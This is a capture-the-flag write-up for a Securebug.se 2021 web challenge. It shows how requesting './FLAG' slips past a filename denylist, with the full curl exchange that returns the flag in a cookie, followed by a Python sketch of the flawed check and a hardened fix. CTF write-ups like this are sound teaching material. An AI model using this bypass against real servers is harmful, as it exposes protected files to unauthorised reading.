Securebug.se CTF Odin 2021: READ THE FLAG

READ THE FLAG

Category: Web security

100 points

Cannot we store them in a database !?

Challenge Link: https://ch2.sbug.se/

Solution

Under the challenge address there are a few words from the author ;-)


But on closer look I realized that I had been redirected from the original address.

I investigated the redirection path, which looks like this:

https://ch2.sbug.se/ => https://ch2.sbug.se/get?getMedia=README => https://ch2.sbug.se/read

The /get?getMedia=README response sets the cookie below:

< set-cookie: content="H3llo\012This is my resume.\012I am EXPERT in cyber security\012"; Path=/

which after redirection is displayed under the /read address.

I played with it a bit until I found that https://ch2.sbug.se/get?getMedia=FLAG responds with the message YOU CANNOT GET A FLAG THAT EASY. That’s why I tried the following:

curl 'https://ch2.sbug.se/get?getMedia=./FLAG' -v
*   Trying 172.67.202.196:443...
* Connected to ch2.sbug.se (172.67.202.196) port 443 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* successfully set certificate verify locations:
*  CAfile: /etc/ssl/certs/ca-certificates.crt
*  CApath: /etc/ssl/certs
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
* TLSv1.3 (IN), TLS handshake, Server hello (2):
* TLSv1.3 (IN), TLS handshake, Encrypted Extensions (8):
* TLSv1.3 (IN), TLS handshake, Certificate (11):
* TLSv1.3 (IN), TLS handshake, CERT verify (15):
* TLSv1.3 (IN), TLS handshake, Finished (20):
* TLSv1.3 (OUT), TLS change cipher, Change cipher spec (1):
* TLSv1.3 (OUT), TLS handshake, Finished (20):
* SSL connection using TLSv1.3 / TLS_AES_256_GCM_SHA384
* ALPN, server accepted to use h2
* Server certificate:
*  subject: C=US; ST=California; L=San Francisco; O=Cloudflare, Inc.; CN=sni.cloudflaressl.com
*  start date: Mar  8 00:00:00 2021 GMT
*  expire date: Mar  7 23:59:59 2022 GMT
*  subjectAltName: host "ch2.sbug.se" matched cert's "*.sbug.se"
*  issuer: C=US; O=Cloudflare, Inc.; CN=Cloudflare Inc ECC CA-3
*  SSL certificate verify ok.
* Using HTTP2, server supports multi-use
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x55901e3ca560)
> GET /get?getMedia=./FLAG HTTP/2
> Host: ch2.sbug.se
> user-agent: curl/7.74.0
> accept: */*
> 
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
* old SSL session ID is stale, removing
* Connection state changed (MAX_CONCURRENT_STREAMS == 256)!
< HTTP/2 302 
< date: Tue, 20 Apr 2021 18:30:57 GMT
< content-type: text/html; charset=utf-8
< set-cookie: __cfduid=d2e8b3c0a2ee3362d38825d94d517a3d51618943457; expires=Thu, 20-May-21 18:30:57 GMT; path=/; domain=.sbug.se; HttpOnly; SameSite=Lax; Secure
< location: https://ch2.sbug.se/read
< set-cookie: content="SBCTF{H0W_C0ULD_Y0U_R3AD_TH3_FL4G}\012"; Path=/
< cf-cache-status: DYNAMIC
< cf-request-id: 099225cfc800009d127131b000000001
< expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
< report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=YCgCZJN%2BAHTWNQvla1%2B0C32CkovAgJ8ByqWQwd1JYOV6uj77HqByk1adOR1Dou8j7%2BBTx5Otb%2Bms%2FoIngEhqqwfXhmSRKCTMah6reQ%3D%3D"}],"max_age":604800,"group":"cf-nel"}
< nel: {"report_to":"cf-nel","max_age":604800}
< server: cloudflare
< cf-ray: 6430725faae19d12-AMS
< alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400

Flag

SBCTF{H0W_C0ULD_Y0U_R3AD_TH3_FL4G}
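
The responses above (FLAG refused, ./FLAG served) are consistent with a check that compares the raw getMedia value against a denylist before opening the file. The sketch below is an added example, not the challenge's code: the handler names, the denylist, the allowlist and the file contents are assumptions, and it shows that pattern next to a version that canonicalises the path and allowlists the result.

```python
import os
import tempfile

DENIED_MSG = "YOU CANNOT GET A FLAG THAT EASY"   # message seen in the write-up
BLOCKED = {"FLAG"}      # assumed denylist applied to the raw parameter
ALLOWED = {"README"}    # assumed allowlist for the hardened variant


def naive_get_media(base_dir, name):
    """Assumed 'before': string comparison on the raw value, then open()."""
    if name in BLOCKED:
        return DENIED_MSG
    with open(os.path.join(base_dir, name)) as fh:
        return fh.read()


def hardened_get_media(base_dir, name):
    """Resolve the path first, then decide on the canonical result."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, name))
    # The file must sit directly in base_dir and be explicitly allowed.
    if os.path.dirname(target) != base or os.path.basename(target) not in ALLOWED:
        return "denied"
    with open(target) as fh:
        return fh.read()


def demo():
    """Run both handlers over the three values used in the write-up."""
    results = {"naive": {}, "hardened": {}}
    with tempfile.TemporaryDirectory() as base:
        # Constructed sample files, not the challenge's real content.
        with open(os.path.join(base, "README"), "w") as fh:
            fh.write("constructed readme\n")
        with open(os.path.join(base, "FLAG"), "w") as fh:
            fh.write("constructed-flag-value\n")
        for name in ("README", "FLAG", "./FLAG"):
            results["naive"][name] = naive_get_media(base, name)
            results["hardened"][name] = hardened_get_media(base, name)
    return results


if __name__ == "__main__":
    for handler, rows in demo().items():
        for name, value in rows.items():
            print(f"{handler:9} {name:8} -> {value!r}")
```

The naive handler refuses FLAG but serves ./FLAG because both strings resolve to the same file while only one matches the denylist; the hardened handler decides on the resolved path, so both are refused.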

luc © 2021